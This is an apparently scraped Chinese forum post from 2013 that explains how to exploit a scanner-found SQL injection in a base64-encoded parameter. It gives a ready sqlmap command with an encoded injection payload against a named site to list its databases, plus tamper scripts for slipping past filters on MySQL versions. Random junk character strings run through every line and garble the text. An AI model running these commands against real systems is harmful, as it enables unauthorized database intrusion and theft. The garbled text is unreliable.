WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?" x+ m& ^ f$ ?! B7 V2 u
& t, J. Z( j) M$ T3 U8 e/ x
sqlmap的tamper里有个base64encode.py; n- \. h% g8 ~! {
2 o) ~) c3 N4 O% @& f( c" G1 a
使用如下
. S8 F: |( V0 K/ h) W- V% W5 {6 ^5 e9 \
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
+ v5 M" D+ q( u6 |5 `/ [+ h6 n% i% l5 p# O" Q+ l7 v
. T: D& i7 {7 N' Bsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
2 Z: X; L! z3 B% t
- U9 _2 U( U; i) F/ _) ^* f- K. q- t其中常用到的bypass脚本绕过SQLMAP主要两个脚本:7 E! r# S# R$ G1 D% t3 |
7 j- S1 }( ]$ q/ j9 z# Yspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入* @3 X8 p' @) n8 C
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
6 u, R; O: f2 ]9 o3 c* h8 j首先确定目标数据库版本,然后选择相应的脚本。2 D( B* m/ h# C6 J0 {1 \) e
-v 3 --batch --tamper "space2hash.py"
1 E( t1 h/ O s% t* T2 }- I% O, G: A5 ^
还有其他一些插件:
1 J m1 i$ {6 _( f( n* R0 qencodes编码 ——charencode.py
' {. @ ^% u0 s; j Z8 _) l8 cbase64编码 —— base64encode.py2 Y* V/ B0 q; P: g9 `, |
替换空格和关键字 —— halfversionedmorekeywords.py Z. }. J. q6 G3 F; d# f: ^
|
4 E8 M3 B" w+ n, E
* N# ~. p# ?! L! L$ }* J3 k, N# _2 ^- J
) j C1 m) p' E' t/ s
( B# ~. g) a6 A# D |
发表于 2013-11-23 15:50:45
收藏
支持
反对